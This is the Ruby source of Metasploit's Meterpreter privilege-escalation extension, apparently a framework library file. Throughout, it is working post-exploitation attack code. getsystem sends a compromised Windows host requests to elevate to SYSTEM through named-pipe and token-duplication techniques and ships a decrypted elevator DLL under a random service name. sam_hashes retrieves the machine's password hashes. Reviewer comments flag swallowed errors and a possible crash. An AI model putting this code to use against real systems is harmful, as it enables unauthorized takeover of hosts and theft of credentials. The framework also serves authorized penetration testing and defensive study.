Path: blob/master/lib/rex/post/meterpreter/extensions/priv/priv.rb
# -*- coding: binary -*-

require 'rex/post/meterpreter/extensions/priv/tlv'
require 'rex/post/meterpreter/extensions/priv/command_ids'
require 'rex/post/meterpreter/extensions/priv/passwd'
require 'rex/post/meterpreter/extensions/priv/fs'

module Rex
module Post
module Meterpreter
module Extensions
module Priv

###
#
# This meterpreter extension provides a privilege escalation interface that is
# capable of doing things like dumping password hashes and performing local
# exploitation.
#
# Every request here is built as a TLV packet and sent through the session's
# +client+; the server-side handling of the command ids is not in this file.
#
###
class Priv < Extension

  # Numeric identifier used to register this extension (from command_ids).
  def self.extension_id
    EXTENSION_ID_PRIV
  end

  # Elevation techniques accepted by #getsystem, keyed by name. The integer
  # value is what goes on the wire in TLV_TYPE_ELEVATE_TECHNIQUE; +any+ (0)
  # leaves the choice to the remote side.
  TECHNIQUE = {
    any: 0,
    named_pipe: 1,
    named_pipe_2: 2,
    token_dup: 3,
    named_pipe_rpcss: 4,
    named_pipe_print_spooler: 5,
    named_pipe_efs: 6
  }.freeze

  #
  # Initializes the privilege escalation extension.
  #
  # Registers the 'priv' alias with the client and creates the file-system
  # helper (+fs+).
  #
  # @param client [Object] the meterpreter client this extension belongs to
  #
  def initialize(client)
    super(client, 'priv')

    client.register_extension_aliases(
      [
        {
          'name' => 'priv',
          'ext' => self
        },
      ])

    # Initialize sub-classes
    self.fs = Fs.new(client)
  end

  #
  # Attempt to elevate the meterpreter to Local SYSTEM
  #
  # @param technique [Integer] one of the TECHNIQUE values; defaults to
  #   TECHNIQUE[:any], i.e. try the techniques rather than a specific one
  # @return [Array(Boolean, Integer)] +[true, technique]+ on success, where
  #   +technique+ is the value the server reported back; +[false, 0]+ otherwise
  # @raise [RuntimeError] when no elevator binary exists for any of the
  #   client's binary suffixes (only checked for the techniques that need it)
  #
  def getsystem(technique=TECHNIQUE[:any])
    request = Packet.create_request(COMMAND_ID_PRIV_ELEVATE_GETSYSTEM)

    # The *any*, named-pipe, named-pipe-2 and token-dup techniques all get a
    # service name: a fresh random 6-character lowercase string per call. The
    # remaining named-pipe variants are sent without one.
    if [TECHNIQUE[:any], TECHNIQUE[:named_pipe], TECHNIQUE[:named_pipe_2], TECHNIQUE[:token_dup]].include?(technique)
      request.add_tlv(TLV_TYPE_ELEVATE_SERVICE_NAME, Rex::Text.rand_text_alpha_lower(6))
    end

    # We only need the elevate DLL for when we're invoking the TokenDup or
    # NamedPipe2 method, which we'll only use if required (ie. trying all or
    # when that method is asked for explicitly)
    if [TECHNIQUE[:any], TECHNIQUE[:named_pipe_2], TECHNIQUE[:token_dup]].include?(technique)
      # Take the first binary suffix for which a packaged elevator exists.
      elevator_path = nil
      client.binary_suffix.each { |s|
        elevator_path = MetasploitPayloads.meterpreter_path('elevator', s)
        if !elevator_path.nil?
          break
        end
      }
      if elevator_path.nil?
        # List every candidate that was looked for so the error is actionable.
        elevators = ''
        client.binary_suffix.each { |s|
          elevators << "elevator.#{s}, "
        }
        raise RuntimeError, "#{elevators.chomp(', ')} not found", caller
      end

      # The packaged binary is stored encrypted; decrypt it before it is
      # attached to the request.
      encrypted_elevator_data = ::File.binread(elevator_path)
      elevator_data = ::MetasploitPayloads::Crypto.decrypt(ciphertext: encrypted_elevator_data)

      request.add_tlv(TLV_TYPE_ELEVATE_SERVICE_DLL, elevator_data)
      request.add_tlv(TLV_TYPE_ELEVATE_SERVICE_LENGTH, elevator_data.length)
    end

    request.add_tlv(TLV_TYPE_ELEVATE_TECHNIQUE, technique)

    # as some service routines can be slow we bump up the timeout to 90 seconds
    response = client.send_request(request, 90)

    # From here on +technique+ is whatever the server reported back, not the
    # value the caller asked for.
    technique = response.get_tlv_value(TLV_TYPE_ELEVATE_TECHNIQUE)

    if(response.result == 0 and technique != nil)
      # Elevation succeeded: make sure stdapi is available, refresh the
      # session info and re-read the privilege list.
      client.core.use('stdapi') if not client.ext.aliases.include?('stdapi')
      client.update_session_info
      client.sys.config.getprivs
      if client.framework.db and client.framework.db.active
        # NOTE(review): the `rescue nil` modifier swallows any error raised by
        # report_note, so a failed write leaves no record of the elevation in
        # the workspace and no error in the log.
        client.framework.db.report_note(
          :host => client.sock.peerhost,
          :workspace => client.framework.db.workspace,
          :type => 'meterpreter.getsystem',
          :data => {:technique => technique}
        ) rescue nil
      end
      return [ true, technique ]
    end

    return [ false, 0 ]
  end

  #
  # Returns an array of SAM hashes from the remote machine.
  #
  # @return [Array<SamUser>] one entry per newline-separated line of the
  #   TLV_TYPE_SAM_HASHES value
  #
  # NOTE(review): if get_tlv_value returns nil for a missing TLV, the split
  # below raises NoMethodError rather than returning an empty array — confirm.
  #
  def sam_hashes
    # This can take a long long time for large domain controls, bump the timeout to one hour
    response = client.send_request(Packet.create_request(COMMAND_ID_PRIV_PASSWD_GET_SAM_HASHES), 3600)

    response.get_tlv_value(TLV_TYPE_SAM_HASHES).split(/\n/).map { |hash|
      SamUser.new(hash)
    }
  end

  #
  # Modifying privileged file system attributes.
  #
  attr_reader :fs

protected

  attr_writer :fs # :nodoc:

end

end; end; end; end; end